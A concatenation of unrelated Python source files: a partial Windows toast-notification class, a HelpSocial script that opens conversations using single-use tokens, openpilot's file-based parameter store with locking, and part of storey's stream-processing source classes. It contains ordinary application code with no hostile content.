from win32gui import LoadIcon
from win32gui import LoadImage
from win32gui import NIF_ICON
from win32gui import NIF_INFO
from win32gui import NIF_MESSAGE
from win32gui import NIF_TIP
from win32gui import NIM_ADD
from win32gui import NIM_DELETE
from win32gui import NIM_MODIFY
from win32gui import RegisterClass
from win32gui import UnregisterClass
from win32gui import Shell_NotifyIcon
from win32gui import UpdateWindow
from win32gui import WNDCLASS
from win32gui import NIIF_NOSOUND
# ############################################################################
# ########### Classes ##############
# ##################################
class ToastNotifier(object):
"""Create a Windows 10 toast notification.
from: https://github.com/jithurjacob/Windows-10-Toast-Notifications
"""
def __init__(self):
"""Initialize."""
self._thread = None
def _show_toast(self, title, msg,
icon_path, duration, sound):
"""Notification settings.
:title: notification title
:msg: notification message
:icon_path: path to the .ico file to custom notification
:duration: delay in seconds before notification self-destruction
:sound: if a sound should be played
"""
message_map = {WM_DESTROY: self.on_destroy, }
# Register the window class.
self.wc = WNDCLASS()
self.hinst = self.wc.hInstance = GetModuleHandle(None)
self.wc.lpszClassName = str("PythonTaskbar") # must be a string
self.wc.lpfnWndProc = message_map # could also specify a wndproc.
try:
self.classAtom = RegisterClass(self.wc)
except:
pass #not sure of this
style = WS_OVERLAPPED | WS_SYSMENU
self.hwnd = CreateWindow(self.classAtom, "Taskbar", style,
0, 0, CW_USEDEFAULT,
CW_USEDEFAULT,
0, 0, self.hinst, None)
UpdateWindow(self.hwnd)
# icon
if icon_path is not None:
icon_path = path.realpath(icon_path)
else:
icon_path = resource_filename(Requirement.parse("win10toast"), "win10toast/data/python.ico")
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
try:
hicon = LoadImage(self.hinst, icon_path,
IMAGE_ICON, 0, 0, icon_flags)
except Exception as e:
logging.error("Some trouble with the icon ({}): {}"
.format(icon_path, e))
hicon = LoadIcon(0, IDI_APPLICATION)
# Taskbar icon
flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
nid = (self.hwnd, 0, flags, WM_USER + 20, hicon, "Tooltip")
Shell_NotifyIcon(NIM_ADD, nid)
if sound is False:
Shell_NotifyIcon(NIM_MODIFY, (self.hwnd, 0, NIF_INFO,
WM_USER + 20,
hicon, "Balloon Tooltip", msg, 200,
title, NIIF_NOSOUND))
else:
Shell_NotifyIcon(NIM_MODIFY, (self.hwnd, 0, NIF_INFO,
WM_USER + 20,
hicon, "Balloon Tooltip", msg, 200,
title))
# take a rest then destroy
sleep(duration)
DestroyWindow(self.hwnd)
UnregisterClass(self.wc.lpszClassName, None)
return None
def show_toast(self, title="Notification", msg="Here comes the message",
icon_path=None, duration=5, threaded=False, sound=True):
"""Notification settings.
:title: notification title
:msg: notification message
:icon_path: path to the .ico file to custom notification
:duration: delay in seconds before notification self-destruction
:sound: if a sound should be played
"""
if not threaded:
self._show_toast(title, msg, icon_path, duration, sound)
else:
if self.notification_active():
# We have an active notification, let is finish so we don't spam them
return False
self._thread = threading.Thread(target=self._show_toast, args=(title, msg, icon_path, duration))
self._thread.start()
return True
def notification_active(self):
"""See if we have an active notification showing"""
if self._thread != None and self._thread.is_alive():
# We have an active notification, let is finish we don't spam them
return True
return False
def on_destroy(self, hwnd, msg, wparam, lparam):
"""Clean after notification ended.
:hwnd:
:msg:
:wparam:
:lparam:
"""
nid = (self.hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, nid)
PostQuitMessage(0)
return None
|
launch_conversation.py
|
#!/usr/bin/env python3
# Author: Jacob Schofield <jacob@helpsocial.com>
# Copyright (c) 2017 HelpSocial, Inc.
# See LICENSE for details
import multiprocessing as mp
import os
import re
import sys
import webbrowser
try:
import ujson as json
except ImportError:
import json
from argparse import ArgumentParser
from multiprocessing import Queue
from time import time, sleep
from urllib.parse import ParseResult, urlsplit, urlunsplit, parse_qs, urlencode
# add the helpsocial directory to the path
# so that we can import it more cleanly
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from helpsocial import RestConnectClient
from helpsocial.auth import UserAuth
from helpsocial.hooks import RequestPrinter, ResponsePrinter
from helpsocial.utils import data_get
class Worker(object):
def __init__(self, client, template_url, token):
self.name = 'Worker-' + os.urandom(4).hex()
self.pid = None
self.template_url = template_url
self.client = client
self.auth = UserAuth(client.auth_scope, client.api_key, token)
def handle(self, manager, conversation_id):
self.pid = str(mp.current_process().pid)
self._log('handling conversation {}', conversation_id)
url = re.sub('{conversation_id}', conversation_id, self.template_url)
try:
authed_url = self._authenticate(url, self._get_single_use_token())
self._log('opening conversation spa [{}]...', authed_url)
if webbrowser.open_new(authed_url):
self._log('opened conversation spa.')
else:
self._log('failed to open conversation spa.')
except Exception as e:
self._log('{} opening conversation {} spa.', e, conversation_id)
finally:
manager.work_complete(self)
self.pid = None
def _get_single_use_token(self):
"""Retrieve an single use token for the authenticated user.
This allows the client to relatively safely authenticate their user through
the query string, as is required when accessing a page via an iFrame, where
headers cannot be set.
"""
self._log('Retrieving single use token.')
response = self.client.get('tokens/exchange', auth=self.auth, http_errors=True)
if response.status_code != 200:
raise Exception(response.json())
return data_get(response.json(), 'data.token')
def _authenticate(self, url, token):
self._log('Authenticating spa request [{}].', url)
parsed = urlsplit(url)
query = {} if not parsed.query else parse_qs(parsed.query)
query.update({
'scope': token['scope'],
'token': token['value']
})
return urlunsplit((parsed.scheme, parsed.netloc, parsed.path,
urlencode(query, doseq=True), parsed.fragment,))
def _log(self, message, *args, **kwargs):
print('[{},{}] {}'.format(self.name, self.pid, message.format(*args, **kwargs)))
class Manager(object):
def __init__(self, workers=-1):
self.cancelled = False
self._workers = Queue(workers)
self._queue = Queue()
self._processes = []
self._thread = mp.Process(target=self._run)
def add_worker(self, worker):
if self._workers.full():
raise Exception('Worker pool full')
self._workers.put_nowait(worker)
def queue(self, conversation):
self._queue.put(conversation)
def has_pending(self):
return not self._queue.empty()
def start(self):
self._thread.start()
def stop(self):
self.cancelled = True
for process in self._processes:
process.terminate()
start = time()
while self._thread.is_alive():
if (time() - start) > 30:
self._thread.terminate()
break
sleep(1)
def work_complete(self, worker):
self._workers.put_nowait(worker)
def _run(self):
while True:
if self.cancelled:
break
try:
worker = self._workers.get_nowait()
except:
print('No worker available.')
sleep(1)
break
try:
job = self._queue.get_nowait()
except:
print('No job available.')
self._workers.put(worker)
sleep(1)
break
process = mp.Process(target=worker.handle, args=(self, job,))
self._processes.append(process)
process.start()
def read_config(path):
"""Read the json configuration
:type path: string
:param path:
:return:
"""
if not os.path.exists(path):
raise IOError('{} does not exist.', path)
with open(path, 'r') as file_:
return json.load(file_)
def single(conversation_id, config_path):
config = read_config(config_path)
client = RestConnectClient(
data_get(config, 'auth.auth_scope'),
data_get(config, 'auth.api_key'),
host=data_get(config, 'api.host'),
ssl=data_get(config, 'api.ssl'),
request_hooks=[RequestPrinter()],
response_hooks=[ResponsePrinter()]
)
manager = Manager()
manager.add_worker(Worker(client,
data_get(config, 'launch_conversation.spa_url'),
data_get(config, 'launch_conversation.user_token')))
manager.queue(conversation_id)
manager.start()
while manager.has_pending():
sleep(1)
manager.stop()
if __name__ == '__main__':
parser = ArgumentParser()
sub = parser.add_subparsers()
single_cmd = sub.add_parser('single')
single_cmd.add_argument('conversation_id', help='Conversation id to open.')
single_cmd.add_argument('--config', dest='config_path', default=os.path.join(os.path.abspath(os.path.dirname(__file__)), '.config.json'))
single_cmd.set_defaults(func=single)
args = vars(parser.parse_args())
func = args['func']
del args['func']
func(**args)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.PERSISTENT],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.PERSISTENT],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db='/data/params'):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(ord(c) < 128 and ord(c) >= 32 for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, pp.encode("hex")))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
sources.py
|
import asyncio
import copy
import csv
import math
import queue
import threading
import uuid
import warnings
from datetime import datetime
from typing import List, Optional, Union, Callable, Coroutine, Iterable
import pyarrow.parquet as pq
import pandas
import pytz
from .dtypes import _termination_obj, Event, legal_time_units
from .flow import Flow, Complete
from .utils import url_to_file_system, drop_reserved_columns, find_filters
class AwaitableResult:
"""Future result of a computation. Calling await_result() will return with the result once the computation is completed."""
def __init__(self, on_error: Optional[Callable[[], None]] = None):
self._on_error = on_error
self._q = queue.Queue(1)
self._completed = False
def await_result(self):
"""Returns the result, once the computation is completed"""
result = self._q.get()
if isinstance(result, BaseException):
if self._on_error:
self._on_error()
raise result
return result
def _set_result(self, element):
if not self._completed:
self._completed = True
self._q.put(element)
def _set_error(self, ex):
self._set_result(ex)
def _convert_to_datetime(obj, time_format: Optional[str] = None):
if isinstance(obj, datetime):
return obj
elif isinstance(obj, float) or isinstance(obj, int):
return datetime.fromtimestamp(obj, tz=pytz.utc)
elif isinstance(obj, str):
if time_format is None:
return datetime.fromisoformat(obj)
else:
return datetime.strptime(obj, time_format)
else:
raise ValueError(f"Could not parse '{obj}' (of type {type(obj)}) as a time.")
class FlowControllerBase:
def __init__(self, key_field: Optional[Union[str, List[str]]], time_field: Optional[str], time_format: Optional[str]):
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._current_uuid_base = None
self._current_uuid_count = 0
def _get_uuid(self):
if not self._current_uuid_base or self._current_uuid_count == 1024:
self._current_uuid_base = uuid.uuid4().hex
self._current_uuid_count = 0
result = f'{self._current_uuid_base}-{self._current_uuid_count:04}'
self._current_uuid_count += 1
return result
def _build_event(self, element, key, event_time):
body = element
element_is_event = hasattr(element, 'id')
if element_is_event:
body = element.body
if not key and self._key_field:
if isinstance(self._key_field, str):
key = body[self._key_field]
else:
key = []
for field in self._key_field:
key.append(body[field])
if not event_time and self._time_field:
event_time = _convert_to_datetime(body[self._time_field], self._time_format)
body[self._time_field] = event_time
if element_is_event:
if key:
element.key = key
if event_time:
element.time = event_time
return element
else:
return Event(body, id=self._get_uuid(), key=key, time=event_time)
class FlowController(FlowControllerBase):
"""Used to emit events into the associated flow, terminate the flow, and await the flow's termination.
To be used from a synchronous context.
"""
def __init__(self, emit_fn, await_termination_fn, return_awaitable_result, key_field: Optional[str] = None,
time_field: Optional[str] = None, time_format: Optional[str] = None):
super().__init__(key_field, time_field, time_format)
self._emit_fn = emit_fn
self._await_termination_fn = await_termination_fn
self._return_awaitable_result = return_awaitable_result
def emit(self, element: object, key: Optional[Union[str, List[str]]] = None, event_time: Optional[datetime] = None,
return_awaitable_result: Optional[bool] = None):
"""Emits an event into the associated flow.
:param element: The event data, or payload. To set metadata as well, pass an Event object.
:param key: The event key(s) (optional) #add to async
:param event_time: The event time (default to current time, UTC).
:param return_awaitable_result: Deprecated! An awaitable result object will be returned if a Complete step appears in the flow.
:returns: AsyncAwaitableResult if a Complete appears in the flow. None otherwise.
"""
if return_awaitable_result is not None:
warnings.warn('return_awaitable_result is deprecated. An awaitable result object will be returned if a Complete step appears '
'in the flow.',
DeprecationWarning)
event = self._build_event(element, key, event_time)
awaitable_result = None
if self._return_awaitable_result:
awaitable_result = AwaitableResult(self.terminate)
event._awaitable_result = awaitable_result
self._emit_fn(event)
return awaitable_result
def terminate(self):
"""Terminates the associated flow."""
self._emit_fn(_termination_obj)
def await_termination(self):
"""Awaits the termination of the flow. To be called after terminate. Returns the termination result of the flow (if any)."""
return self._await_termination_fn()
class FlowAwaiter:
"""Future termination result of a flow. Calling await_termination() will wait for the flow to terminate and return its
termination result."""
def __init__(self, await_termination_fn):
self._await_termination_fn = await_termination_fn
def await_termination(self):
""""waits for the flow to terminate and returns the result"""
return self._await_termination_fn()
class SyncEmitSource(Flow):
"""Synchronous entry point into a flow. Produces a FlowController when run, for use from inside a synchronous context. See AsyncEmitSource
for use from inside an async context.
:param buffer_size: size of the incoming event buffer. Defaults to 1024.
:param key_field: Field to extract and use as the key. Optional.
:param time_field: Field to extract and use as the time. Optional.
:param time_format: Format of the event time. Needed when a nonstandard string timestamp is used (i.e. not ISO or epoch). Optional.
:param name: Name of this step, as it should appear in logs. Defaults to class name (SyncEmitSource).
:type name: string
for additional params, see documentation of :class:`storey.flow.Flow`
"""
_legal_first_step = True
def __init__(self, buffer_size: Optional[int] = None, key_field: Union[list, str, None] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None, **kwargs):
if buffer_size is None:
buffer_size = 1024
else:
kwargs['buffer_size'] = buffer_size
if key_field is not None:
kwargs['key_field'] = key_field
super().__init__(**kwargs)
if buffer_size <= 0:
raise ValueError('Buffer size must be positive')
self._q = queue.Queue(buffer_size)
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._termination_q = queue.Queue(1)
self._ex = None
self._closeables = []
async def _run_loop(self):
loop = asyncio.get_running_loop()
self._termination_future = asyncio.get_running_loop().create_future()
while True:
event = await loop.run_in_executor(None, self._q.get)
try:
termination_result = await self._do_downstream(event)
if event is _termination_obj:
self._termination_future.set_result(termination_result)
except BaseException as ex:
if event is not _termination_obj and event._awaitable_result:
event._awaitable_result._set_error(ex)
self._ex = ex
if not self._q.empty():
event = self._q.get()
if event is not _termination_obj and event._awaitable_result:
event._awaitable_result._set_error(ex)
self._termination_future.set_result(None)
break
if event is _termination_obj:
break
for closeable in self._closeables:
await closeable.close()
def _loop_thread_main(self):
asyncio.run(self._run_loop())
self._termination_q.put(self._ex)
def _raise_on_error(self, ex):
if ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
def _emit(self, event):
if event is not _termination_obj:
self._raise_on_error(self._ex)
self._q.put(event)
if event is not _termination_obj:
self._raise_on_error(self._ex)
def run(self):
"""Starts the flow"""
self._closeables = super().run()
thread = threading.Thread(target=self._loop_thread_main)
thread.start()
def raise_error_or_return_termination_result():
self._raise_on_error(self._termination_q.get())
return self._termination_future.result()
has_complete = self._check_step_in_flow(Complete)
return FlowController(self._emit, raise_error_or_return_termination_result, has_complete, self._key_field, self._time_field,
self._time_format)
class AsyncAwaitableResult:
"""Future result of a computation. Calling await_result() will return with the result once the computation is completed.
Same as AwaitableResult but for an async context."""
def __init__(self, on_error: Optional[Callable[[BaseException], Coroutine]] = None):
self._on_error = on_error
self._q = asyncio.Queue(1)
self._completed = False
async def await_result(self):
"""returns the result of the computation, once the computation is complete"""
result = await self._q.get()
if isinstance(result, BaseException):
if self._on_error:
await self._on_error()
raise result
return result
async def _set_result(self, element):
if not self._completed:
self._completed = True
await self._q.put(element)
async def _set_error(self, ex):
await self._set_result(ex)
class AsyncFlowController(FlowControllerBase):
"""
Used to emit events into the associated flow, terminate the flow, and await the flow's termination. To be used from inside an async def.
"""
def __init__(self, emit_fn, loop_task, await_result, key_field: Optional[str] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None):
super().__init__(key_field, time_field, time_format)
self._emit_fn = emit_fn
self._loop_task = loop_task
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._await_result = await_result
async def emit(self, element: object, key: Optional[Union[str, List[str]]] = None, event_time: Optional[datetime] = None,
await_result: Optional[bool] = None) -> object:
"""Emits an event into the associated flow.
:param element: The event data, or payload. To set metadata as well, pass an Event object.
:param key: The event key(s) (optional)
:param event_time: The event time (default to current time, UTC).
:param await_result: Deprecated. Will await a result if a Complete step appears in the flow.
:returns: The result received from the flow if a Complete step appears in the flow. None otherwise.
"""
if await_result is not None:
warnings.warn('await_result is deprecated. An awaitable result object will be returned if a Complete step appears '
'in the flow.',
DeprecationWarning)
event = self._build_event(element, key, event_time)
awaitable = None
if self._await_result:
awaitable = AsyncAwaitableResult(self.terminate)
event._awaitable_result = awaitable
await self._emit_fn(event)
if self._await_result:
result = await awaitable.await_result()
if isinstance(result, BaseException):
raise result
return result
async def terminate(self):
"""Terminates the associated flow."""
await self._emit_fn(_termination_obj)
async def await_termination(self):
"""Awaits the termination of the flow. To be called after terminate. Returns the termination result of the flow (if any)."""
return await self._loop_task
class AsyncEmitSource(Flow):
"""
Asynchronous entry point into a flow. Produces an AsyncFlowController when run, for use from inside an async def.
See SyncEmitSource for use from inside a synchronous context.
:param buffer_size: size of the incoming event buffer. Defaults to 1024.
:param name: Name of this step, as it should appear in logs. Defaults to class name (AsyncEmitSource).
:type name: string
:param time_field: Field to extract and use as the time. Optional.
:param time_format: Format of the event time. Needed when a nonstandard string timestamp is used (i.e. not ISO or epoch). Optional.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
_legal_first_step = True
def __init__(self, buffer_size: int = 1024, key_field: Union[list, str, None] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if buffer_size <= 0:
raise ValueError('Buffer size must be positive')
self._q = asyncio.Queue(buffer_size)
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._ex = None
self._closeables = []
async def _run_loop(self):
while True:
event = await self._q.get()
try:
termination_result = await self._do_downstream(event)
if event is _termination_obj:
return termination_result
except BaseException as ex:
self._ex = ex
if event is not _termination_obj and event._awaitable_result:
awaitable = event._awaitable_result._set_error(ex)
if awaitable:
await awaitable
if not self._q.empty():
await self._q.get()
self._raise_on_error()
finally:
if event is _termination_obj or self._ex:
for closeable in self._closeables:
await closeable.close()
def _raise_on_error(self):
if self._ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
async def _emit(self, event):
if event is not _termination_obj:
self._raise_on_error()
await self._q.put(event)
if event is not _termination_obj:
self._raise_on_error()
async def run(self):
"""Starts the flow"""
self._closeables = super().run()
loop_task = asyncio.get_running_loop().create_task(self._run_loop())
has_complete = self._check_step_in_flow(Complete)
return AsyncFlowController(self._emit, loop_task, has_complete, self._key_field, self._time_field)
class _IterableSource(Flow):
_legal_first_step = True
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._termination_q = queue.Queue(1)
self._ex = None
self._closeables = []
def _init(self):
pass
async def _run_loop(self):
raise NotImplementedError()
async def _async_loop_thread_main(self):
try:
self._termination_future = asyncio.get_running_loop().create_future()
termination_result = await self._run_loop()
self._termination_future.set_result(termination_result)
except BaseException as ex:
self._ex = ex
self._termination_future.set_result(None)
finally:
for closeable in self._closeables:
await closeable.close()
def _loop_thread_main(self):
asyncio.run(self._async_loop_thread_main())
self._termination_q.put(self._ex)
def _raise_on_error(self, ex):
if ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
def run(self):
self._closeables = super().run()
self._init()
thread = threading.Thread(target=self._loop_thread_main)
thread.start()
def raise_error_or_return_termination_result():
self._raise_on_error(self._termination_q.get())
return self._termination_future.result()
return FlowAwaiter(raise_error_or_return_termination_result)
async def run_async(self):
self._closeables = super().run()
return await self._run_loop()
class CSVSource(_IterableSource):
"""
Reads CSV files as input source for a flow.
:parameter paths: paths to CSV files
:parameter header: whether CSV files have a header or not. Defaults to False.
:parameter build_dict: whether to format each record produced from the input file as a dictionary (as opposed to a list).
Default to False.
:parameter key_field: the CSV field to be use as the key for events. May be an int (field index) or string (field name) if
with_header is True. Defaults to None (no key). Can be a list of keys
:parameter time_field: the CSV field to be parsed as the timestamp for events. May be an int (field index) or string (field name)
if with_header is True. Defaults to None (no timestamp field).
:parameter timestamp_format: timestamp format as defined in datetime.strptime(). Default to ISO-8601 as defined in
datetime.fromisoformat().
:parameter type_inference: Whether to infer data types from the data (when True), or read all fields in as strings (when False).
Defaults to True.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
def __init__(self, paths: Union[List[str], str], header: bool = False, build_dict: bool = False,
key_field: Union[int, str, List[int], List[str], None] = None, time_field: Union[int, str, None] = None,
timestamp_format: Optional[str] = None, type_inference: bool = True, **kwargs):
kwargs['paths'] = paths
kwargs['header'] = header
kwargs['build_dict'] = build_dict
if key_field is not None:
kwargs['key_field'] = key_field
if time_field is not None:
kwargs['time_field'] = time_field
if timestamp_format is not None:
kwargs['timestamp_format'] = timestamp_format
kwargs['type_inference'] = type_inference
super().__init__(**kwargs)
if isinstance(paths, str):
paths = [paths]
self._paths = paths
self._with_header = header
self._build_dict = build_dict
self._key_field = key_field
self._time_field = time_field
self._timestamp_format = timestamp_format
self._type_inference = type_inference
self._storage_options = kwargs.get('storage_options')
